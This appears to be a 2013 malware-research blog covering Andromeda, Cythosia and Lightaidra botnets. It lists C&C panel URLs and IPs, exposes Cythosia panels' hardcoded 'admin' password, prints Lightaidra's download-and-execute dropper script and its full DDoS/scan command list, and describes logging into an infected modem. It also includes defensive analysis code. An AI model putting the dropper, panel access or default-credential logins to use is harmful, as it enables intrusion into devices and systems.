Tuesday, August 27, 2013

Bitcoin Mining Andromeda Botnet

Admin Panel:
hxxp://skyline2050.net/761994/adm.php
skyline2050.net. 774 IN A 193.107.16.139

Bins hosted on:
zalil.ru. 830 IN A 194.63.142.66

Domain Name: SKYLINE2050.NET
Registrar: CENTER OF UKRAINIAN INTERNET NAMES
Whois Server: whois.ukrnames.com
Referral URL: http://www.ukrnames.com

Registrant:
Staiger Markus bitcoinlab@safe-mail.net
Kola,  90,
Kiew, 04060
UKRAINE
+380.671234567


Panel screenshots (Stats, Bots, Blacklist, Tasks, Settings) are not preserved here.

Settings: Pssst, your RC4 key is showing.

Tasks: What was that task?

Wednesday, August 21, 2013

Cythosia DDoS Botnet

Cythosia is a typical shit DDoS bot.

As advertised:
http://www.hackforums.net/showthread.php?tid=1415489
Controlled via: Webpanel
Found at: Opensc.ws
Language: C# (2.0)
Developed by: Post.Mort3m
Current Version: 1.0.8
# Runs on Win2k - Win7 / x86 and x64
~ Limited/Guest/Administrator Accounts
# Various Autostart Names and Entries
Main Functions:
+ Download & Execute
+ Update
Distributed Denial of Service Functions (DDoS)
+ Syn
~ 20 Bots can kill little Sites
~ Customizable Port & Strength (Http, Sql, Gameserver)
+ UDP
~ Perform attacks on homeconnections
~ Highly customizable
+ HTTP
~ Multithreaded GET Requests - Generates Traffic as hell
~ Keeps GET Requests open
Socks5 Proxy
+ Opens Port with UPnP if router supports it
+ Redirects all TCP requests multithreaded -> very good speed
+ Configurable Username and Password
Control Panel
+ Nice looking Ajax Panel
+ Hardcoded Password -> secure
+ Taskmanagement System
+ Export Online SOCKS5 LIST

@Blixx on HF - nice TUT - http://www.hackforums.net/showthread.php?tid=1418263

But I'm confused. Why do the H4X0r$ on HF not know how to setup a simple shitty bot panel?
Oh.. right.. LMAO

I downloaded the archive and inside is a .NET obfuscator. Why? Was this bot written in C# or not? (See above in the advert: Language: C#)

I was bored so I kept looking... the source of index.php:

<?php
session_start();
// One hardcoded credential for every panel: the password is "admin", stored as an unsalted MD5.
$crypt_pw = md5("admin");
if(isset($_POST['submit']))
{
    // Login succeeds when the MD5 of the submitted password equals the hardcoded hash.
    if(isset($_POST['pw']) && md5($_POST['pw']) == $crypt_pw)
    {
        $_SESSION['hydra_loggedin'] = 1;
        header("Location: admin/index.php");
    }
    else
    {
        header("Location: index.php");
    }
}
?>

Hahaha!
Is this a joke?
Either way, I'm laughing
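The login check from index.php above, mirrored in Python with a hardened replacement beside it. This is an added example, not code from the original post or from Cythosia: the tiny wordlist is constructed, and the PBKDF2 parameters and the stored-hash format are my own choices.

```python
"""Cythosia-style login check (hardcoded, unsalted MD5) next to a hardened one.
Added example; not code from the original post or from the Cythosia panel."""
import hashlib
import hmac
import os

# The panel's scheme: a single hardcoded password, stored as an unsalted MD5.
STORED_MD5 = hashlib.md5(b"admin").hexdigest()  # 21232f297a57a5a743894a0e4a801fc3


def cythosia_style_check(password: str) -> bool:
    """Mirror of index.php: md5($_POST['pw']) == md5("admin")."""
    return hashlib.md5(password.encode()).hexdigest() == STORED_MD5


# Constructed mini wordlist; real ones run to millions of entries.
WORDLIST = ["123456", "password", "admin", "letmein"]


def recover_from_md5(digest_hex: str, wordlist=WORDLIST):
    """Unsalted fast hash: one md5 per candidate is all a crack costs."""
    for cand in wordlist:
        if hashlib.md5(cand.encode()).hexdigest() == digest_hex:
            return cand
    return None


# Hardened replacement: random per-password salt, slow KDF, constant-time compare.
ITERATIONS = 200_000  # assumption: tune to ~100 ms on the panel's host


def hash_password(password: str, salt: bytes = b"") -> str:
    """Return 'pbkdf2_sha256$<iters>$<salt hex>$<dk hex>' (format is my own choice)."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    print("panel accepts 'admin':", cythosia_style_check("admin"))
    print("recovered from hash:", recover_from_md5(STORED_MD5))
    stored = hash_password("correct horse")
    print("hardened verify:", verify_password("correct horse", stored),
          verify_password("admin", stored))
```

The second scheme does not make a hardcoded password any less hardcoded; the point is that a leaked hash no longer hands the attacker the password for every other install, and the compare no longer short-circuits on the first differing byte.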


15 Cythosia DDoS Botnet Panels 

I decided to gather all the panels I could find and have a look inside.

hxxp://fixed-ao.com.ar/Webpanel/admin/index.php
hxxp://myfiles.besaba.com/admin/index.php
hxxp://www.kazekiki.com.nu/Webpanel/admin/index.php
hxxp://zjomzjom.freehost.pl/admin/index.php
hxxp://mucomucox4.bedavahost.biz/Botnet/admin/index.php
hxxp://testingsecuritybyv0id.com/91287521985/admin/index.php
hxxp://boucraa.no-ip.org/bot/admin/index.php
hxxp://monit-css.vv.si/admin/index.php
hxxp://tigerromnci.eb2a.com/Webpanel/admin/index.php
hxxp://bouxss.juplo.com/1/admin/index.php
hxxp://evcorp.xtreemhost.com/Webpanel/admin/index.php
hxxp://www.l2eyes.com/Webpanel/admin/index.php
hxxp://xxxpass.netsons.org/Webpanel/admin/index.php
hxxp://www.micr0soft.tk/
hxxp://www.eocgroupz.com/aldi/Webpanel/admin/index.php


Ok, I have a TUT for all the Ubers at HF.

Step 1. Use shared free hosting for your bot panels, that's a really good idea. I like having adverts on my C&C panels.

Good grief...


Step 2. Another great thing about free hosting is they rate limit or simply cut off your MySQL usage. Thankfully the panel has a hard coded PW so I can see a panel of error messages. Yay.


Lol 


Lol again...


and again.


hmmm...not working?

Step 3. Be sure to use the included Eazfuscator.NET .NET Obfuscator and Optimizer - That shiz will FUD you up..

Step 4. Profit.


Summary

15 panels on different domains, using different bot builds.

0 bots online.

30 mins. of my time wasted.

At least I had a good laugh.


Monday, August 19, 2013

Lightaidra - Embedded Linux Device Botnet

I was checking some logs and found an IP attempting to connect to telnet (port 23) on one of my servers. Usually when you see this kind of stuff in the logs it is just a scanner or someone running nmap to look around. This time I found an active bot scanning and building a botnet.

The Lightaidra DDoS malware dates from 2012 but is still doing quite well in the wild, mainly because it relies on the many consumer network devices that still use default credentials such as admin/admin or root/admin. There are other resources and blogs that give more details about this particular strain. I have included some links at the bottom.

Lightaidra is an open-source bot for embedded Linux devices, described by its creator, Federico Fazzi, as an "IRC-based mass router scanner/exploiter". Instead of infecting PCs, it runs on devices like cable and DSL modems and home routers.

The operation is straightforward and needs two servers to manage the entire botnet: an HTTP server hosting the per-architecture binaries used for infection, and an IRC server that issues commands to the bots.

The first thing the bot does once it has logged in to a new device over telnet is fetch and run "getbinaries.sh". Note that Lightaidra requires Linux on the device, plus a wget binary and a writable /var/run, both of which the script depends on.
#!/bin/sh
# THIS SCRIPT DOWNLOAD THE BINARIES INTO ROUTER.
# UPLOAD GETBINARIES.SH IN YOUR HTTPD.
# YOUR HTTPD SERVER:
REFERENCE_HTTP="http://127.0.0.1"
# NAME OF BINARIES:
REFERENCE_MIPSEL="mipsel"
REFERENCE_MIPS="mips"
REFERENCE_SUPERH="sh"
REFERENCE_ARM="arm"
REFERENCE_PPC="ppc"
rm -fr /var/run/${REFERENCE_MIPSEL} \
/var/run/${REFERENCE_MIPS} \
/var/run/${REFERENCE_SUPERH} \
/var/run/${REFERENCE_ARM} \
/var/run/${REFERENCE_PPC}
wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPSEL} -P /var/run && chmod +x /var/run/${REFERENCE_MIPSEL} && /var/run/${REFERENCE_MIPSEL}
wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPS} -P /var/run && chmod +x /var/run/${REFERENCE_MIPS} && /var/run/${REFERENCE_MIPS}
wget -c ${REFERENCE_HTTP}/${REFERENCE_ARM} -P /var/run && chmod +x /var/run/${REFERENCE_ARM} && /var/run/${REFERENCE_ARM}
wget -c ${REFERENCE_HTTP}/${REFERENCE_PPC} -P /var/run && chmod +x /var/run/${REFERENCE_PPC} && /var/run/${REFERENCE_PPC}
wget -c ${REFERENCE_HTTP}/${REFERENCE_SUPERH} -P /var/run && chmod +x /var/run/${REFERENCE_SUPERH} && /var/run/${REFERENCE_SUPERH}
sleep 3;
rm -fr /var/run/getbinaries.sh
As you can see, all this script does is download the bot binary for each CPU architecture Lightaidra is built for (MIPSEL, MIPS, ARM, PowerPC and SuperH; the source can also be compiled as a 32- or 64-bit x86 Linux binary) and run each one. It does not check the device's architecture first and fetch only the matching binary: it downloads and executes all of them, and whichever one the kernel can run is the one for the right architecture. Each line is a wget && chmod && exec chain, so a binary for the wrong architecture simply fails with "Exec format error" and, since there is no set -e, the script carries on to the next line. The script deletes itself at the end but leaves every downloaded binary behind in /var/run, which is a handy indicator. That's not lazy at all.

Once a binary that matches the device's architecture has run, it connects to the IRC command-and-control server and waits in the channel for further instructions.

Lightaidra's primary features are scanning for other routers/modems to infect and (DDoS) Distributed Denial of Service attacks. The bot can also execute commands on the system it is installed.



So here is how I found it. I telnetted back to the IP I found in my logs..

No password for root. Face-palm.
Looks like I was connected to a DSL modem. Many consumer modems and routers ship with default credentials such as "admin/admin" or "root/admin" that are never changed, which is why Lightaidra can take them over so easily.

ps output: this is an indicator of Lightaidra infection - the default path is /var/run.
Note this is a device with an ARM CPU.



Look inside the default Lightaidra directory /var/run and you will see the downloaded binaries and the files .lightpid and .lightscan.
The file .lightscan is the list of IP addresses the bot has found that respond on telnet.



Command & Control servers I found inside the ARM and SH binaries.
178.79.183.247
192.79.153.207


The binary reveals the C&C in plain text.
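Added example, not from the original post or from Lightaidra, covering the two points above: the dropper leaves a binary for every architecture in /var/run, and the C&C addresses sit in plain text inside them. The script identifies each file's ELF architecture from its header (the check getbinaries.sh never makes) and pulls IPv4 literals out of its printable strings. The ELF images it works on are constructed stand-ins, not the real drops; the two addresses embedded in them are the ones listed above.

```python
"""Triage of Lightaidra-style drops in /var/run: identify each binary's ELF
architecture and pull candidate C&C addresses from its printable strings.
Added example; not part of the original post or of Lightaidra."""
import re
import struct

ELF_MAGIC = b"\x7fELF"
# e_machine values from the ELF specification for the architectures the dropper covers.
EM_NAMES = {3: "x86", 8: "mips", 20: "ppc", 40: "arm", 42: "superh", 62: "x86_64"}


def elf_arch(blob: bytes):
    """Return (machine, bits, endianness) for an ELF image, or None if it is not ELF."""
    if len(blob) < 20 or blob[:4] != ELF_MAGIC:
        return None
    bits = {1: 32, 2: 64}.get(blob[4])          # EI_CLASS
    endian = {1: "little", 2: "big"}.get(blob[5])  # EI_DATA
    if bits is None or endian is None:
        return None
    fmt = "<H" if endian == "little" else ">H"
    (e_machine,) = struct.unpack_from(fmt, blob, 18)
    name = EM_NAMES.get(e_machine, f"unknown({e_machine})")
    if name == "mips" and endian == "little":
        name = "mipsel"  # the dropper's own naming: mipsel vs mips
    return name, bits, endian


IPV4 = re.compile(
    rb"(?<![\d.])(?:25[0-5]|2[0-4]\d|1?\d?\d)(?:\.(?:25[0-5]|2[0-4]\d|1?\d?\d)){3}(?![\d.])")


def printable_strings(blob: bytes, min_len: int = 4):
    """Same idea as the strings(1) tool: runs of printable ASCII."""
    return [m.group() for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, blob)]


def candidate_c2(blob: bytes):
    """IPv4 literals among the binary's strings, minus the obvious non-routables."""
    found = set()
    for s in printable_strings(blob):
        for m in IPV4.finditer(s):
            ip = m.group().decode()
            if ip.startswith(("0.", "127.", "255.")):
                continue
            found.add(ip)
    return sorted(found)


def fake_elf(e_machine: int, bits: int, little: bool, payload: bytes) -> bytes:
    """Constructed ELF header plus payload for offline testing; not a real binary."""
    hdr = bytearray(52 if bits == 32 else 64)
    hdr[:4] = ELF_MAGIC
    hdr[4] = 1 if bits == 32 else 2
    hdr[5] = 1 if little else 2
    hdr[6] = 1  # EI_VERSION
    fmt = "<H" if little else ">H"
    struct.pack_into(fmt, hdr, 16, 2)          # e_type = ET_EXEC
    struct.pack_into(fmt, hdr, 18, e_machine)  # e_machine
    return bytes(hdr) + payload


# Constructed stand-ins for the files getbinaries.sh leaves in /var/run.
SAMPLE_STRINGS = (b"\x00PRIVMSG %s :* .login <password>\x00"
                  b"178.79.183.247\x00192.79.153.207\x00127.0.0.1\x00")
DROPS = {
    "mipsel": fake_elf(8, 32, True, SAMPLE_STRINGS),
    "mips": fake_elf(8, 32, False, SAMPLE_STRINGS),
    "arm": fake_elf(40, 32, True, SAMPLE_STRINGS),
    "ppc": fake_elf(20, 32, False, SAMPLE_STRINGS),
    "sh": fake_elf(42, 32, True, SAMPLE_STRINGS),
    "notelf": b"#!/bin/sh\nexit 0\n",
}


def triage(drops=DROPS):
    """Map filename -> (arch tuple or None, candidate C&C IPs)."""
    return {name: (elf_arch(blob), candidate_c2(blob)) for name, blob in drops.items()}


if __name__ == "__main__":
    for name, (arch, c2) in triage().items():
        print(f"{name:7} arch={arch} c2={c2}")
```

On the device itself, file and readelf -h answer the first question and strings the second; doing it in code is for running over a pile of drops pulled from many devices. A C&C given as a hostname rather than an address would need a separate pattern.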




This C&C has also been spotted by other researchers at Inside Your Botnet.


* Looking up 178.79.183.247
* Connecting to 178.79.183.247 (178.79.183.247) port 11112...
* Connected. Now logging in...
* Welcome to the Internet Relay Network @localhost.it
* Your host is irc.pollo.org, running version ngircd-19.2 (x86_64/pc/linux-gnu)
* This server has been started Sun Jun 30 2013 at 16:13:07 (UTC)
* irc.pollo.org ngircd-19.2 acCiorRswx beiIklmnoOPrRstvz
* RFC2812 IRCD=ngIRCd CASEMAPPING=ascii PREFIX=(ov)@+ CHANTYPES=#&+ CHANMODES=beI,k,l,imnOPRstz CHANLIMIT=#&+:2 :are supported on this server
* CHANNELLEN=50 NICKLEN=20 TOPICLEN=490 AWAYLEN=127 KICKLEN=400 MODES=5 MAXLIST=beI:50 EXCEPTS=e INVEX=I PENALTY :are supported on this server
* There are 804 users and 0 services on 1 servers
* 1 :channels formed
* I have 804 users, 0 services and 0 servers
* 804 1014 :Current local users: 804, Max: 1014
* 804 1014 :Current global users: 804, Max: 1014
* Highest connection count: 1014 (170926 connections received)



Lightaidra Commands (the help text as it appears in the binary; %s is the channel or nick the bot replies to):

PRIVMSG %s :*
PRIVMSG %s :* .login                <password>        - login to bot's party-line
PRIVMSG %s :* .logout                                 - logout from bot's party-line
PRIVMSG %s :* *** Miscs Commands
PRIVMSG %s :* .exec                 <commands>        - execute a system command
PRIVMSG %s :* .version                                - show the current version of bot
PRIVMSG %s :* .status                                 - show the status of bot
PRIVMSG %s :* .help                                   - show this help message
PRIVMSG %s :* *** Scan Commands
PRIVMSG %s :* .advscan <a> <b>      <user> <passwd>   - scan with user:pass (A.B) classes sets by you
PRIVMSG %s :* .advscan <a> <b>                        - scan with d-link config reset bug
PRIVMSG %s :* .advscan->recursive   <user> <pass>     - scan local ip range with user:pass, (C.D) classes random
PRIVMSG %s :* .advscan->recursive                     - scan local ip range with d-link config reset bug
PRIVMSG %s :* .advscan->random      <user> <pass>     - scan random ip range with user:pass, (A.B) classes random
PRIVMSG %s :* .advscan->random                        - scan random ip range with d-link config reset bug
PRIVMSG %s :* .advscan->random->b   <user> <pass>     - scan local ip range with user:pass, A.(B) class random
PRIVMSG %s :* .advscan->random->b                     - scan local ip range with d-link config reset bug
PRIVMSG %s :* .stop                                   - stop current operation (scan/dos)
PRIVMSG %s :* *** DDos Commands:
PRIVMSG %s :* NOTE: <port> to 0 = random ports, <ip> to 0 = random spoofing,
PRIVMSG %s :* use .*flood->[m,a,p,s,x] for selected ddos, example: .ngackflood->s host port secs
PRIVMSG %s :* where: *=syn,ngsyn,ack,ngack m=mipsel a=arm p=ppc s=superh x=x86
PRIVMSG %s :* .spoof          <ip>                    - set the source address ip spoof
PRIVMSG %s :* .synflood       <host> <port> <secs>    - tcp syn flooder
PRIVMSG %s :* .ngsynflood     <host> <port> <secs>    - tcp ngsyn flooder (new generation)
PRIVMSG %s :* .ackflood       <host> <port> <secs>    - tcp ack flooder
PRIVMSG %s :* .ngackflood     <host> <port> <secs>    - tcp ngack flooder (new generation)
PRIVMSG %s :* *** IRC Commands:
PRIVMSG %s :* .setchan        <channel>               - set new master channel
PRIVMSG %s :* .join           <channel> <password>    - join bot in selected room
PRIVMSG %s :* .part           <channel>               - part bot from selected room
PRIVMSG %s :* .quit                                   - kill the current process
PRIVMSG %s :* *** EOF
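Added example, not part of the original post or of Lightaidra: a parser that turns operator commands seen in IRC PRIVMSG traffic into structured events, following the grammar of the help text above (the -> modifiers on .advscan, the single-letter architecture selector on the flood commands, and the argument layout that distinguishes a credential scan from the d-link config reset scan). The sample channel lines are constructed, not a capture; the nick, channel and target addresses are made up.

```python
"""Parse Lightaidra operator commands from IRC PRIVMSG lines into structured
events, following the grammar of the bot's help text.
Added example; not part of the original post or of Lightaidra."""
import re
from dataclasses import dataclass
from typing import List, Optional

# ".ngackflood->s" tells only the SuperH bots to act (help text: m,a,p,s,x).
ARCH_SELECTOR = {"m": "mipsel", "a": "arm", "p": "ppc", "s": "superh", "x": "x86"}
FLOODS = {"synflood", "ngsynflood", "ackflood", "ngackflood"}

# ":nick!user@host PRIVMSG #chan :.synflood 203.0.113.5 80 60"
PRIVMSG = re.compile(
    r"^(?::(?P<prefix>\S+)\s+)?PRIVMSG\s+(?P<target>\S+)\s+:(?P<text>.*)$")


@dataclass
class BotCommand:
    issuer: Optional[str]   # nick of whoever typed it, if the line carried a prefix
    target: str             # channel or nick the command was sent to
    name: str               # e.g. "advscan", "synflood"
    modifiers: List[str]    # e.g. ["random", "b"] from ".advscan->random->b"
    arch: Optional[str]     # resolved from a trailing flood selector
    args: List[str]
    category: str           # login | exec | scan | ddos | irc | misc | unknown


def classify(name: str) -> str:
    groups = {
        "login": {"login", "logout"},
        "exec": {"exec"},
        "scan": {"advscan"},
        "ddos": FLOODS | {"spoof"},
        "irc": {"setchan", "join", "part", "quit"},
        "misc": {"version", "status", "help", "stop"},
    }
    return next((cat for cat, names in groups.items() if name in names), "unknown")


def parse_privmsg(line: str) -> Optional[BotCommand]:
    """Return a BotCommand for a dot-command; None for chatter or non-PRIVMSG lines."""
    m = PRIVMSG.match(line.strip())
    if not m:
        return None
    text = m.group("text").strip()
    if not text.startswith("."):
        return None
    head, *args = text.split()
    verb, *mods = head[1:].split("->")
    arch = None
    # A single-letter final modifier on a flood command selects the bot architecture.
    if verb in FLOODS and mods and mods[-1] in ARCH_SELECTOR:
        arch = ARCH_SELECTOR[mods.pop()]
    prefix = m.group("prefix")
    issuer = prefix.split("!")[0] if prefix else None
    return BotCommand(issuer, m.group("target"), verb, mods, arch, args, classify(verb))


def scan_method(cmd: BotCommand) -> str:
    """Plain .advscan takes <a> <b> first; the ->recursive/->random forms pick ranges
    themselves. Two trailing args are telnet credentials; none means the d-link bug."""
    rest = cmd.args[2:] if not cmd.modifiers else cmd.args
    if len(rest) == 2:
        return f"telnet {rest[0]}:{rest[1]}"
    if not rest:
        return "d-link config reset bug"
    return "malformed"


def summarize(cmd: BotCommand) -> str:
    """One-line analyst summary of a parsed command."""
    if cmd.name in FLOODS and len(cmd.args) == 3:
        host, port, secs = cmd.args
        arch = f"[{cmd.arch}]" if cmd.arch else ""
        where = f"{host} random ports" if port == "0" else f"{host}:{port}"
        return f"ddos {cmd.name}{arch} {where} for {secs}s"
    if cmd.name == "advscan":
        return f"scan {'->'.join([cmd.name] + cmd.modifiers)} via {scan_method(cmd)}"
    return f"{cmd.category} {cmd.name} {' '.join(cmd.args)}".rstrip()


# Constructed sample of channel traffic, not a real capture.
SAMPLE = [
    ":op!x@y PRIVMSG #bots :.login s3cr3t",
    ":op!x@y PRIVMSG #bots :.advscan->random admin admin",
    ":op!x@y PRIVMSG #bots :.advscan 192 168",
    ":op!x@y PRIVMSG #bots :.ngackflood->s 203.0.113.5 80 60",
    ":op!x@y PRIVMSG #bots :.synflood 203.0.113.5 0 120",
    ":op!x@y PRIVMSG #bots :.exec cat /etc/passwd",
    ":op!x@y PRIVMSG #bots :hello bots",
    "PING :irc.example",
]


def parse_all(lines=SAMPLE) -> List[BotCommand]:
    return [c for c in (parse_privmsg(l) for l in lines) if c]


if __name__ == "__main__":
    for c in parse_all():
        print(summarize(c))
```

Run against a capture of the C&C channel (or a sinkholed copy of it), this turns a wall of PRIVMSG lines into a timeline of who scanned what with which credentials and which targets were flooded, which is the part of an IRC botnet takedown that is otherwise done by eye.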
 
Links about Lightaidra
http://vierko.org/tech/lightaidra-0x2012/

http://www.fitsec.com/blog/index.php/2012/02/19/new-piece-of-malicious-code-infecting-routers-and-iptvs/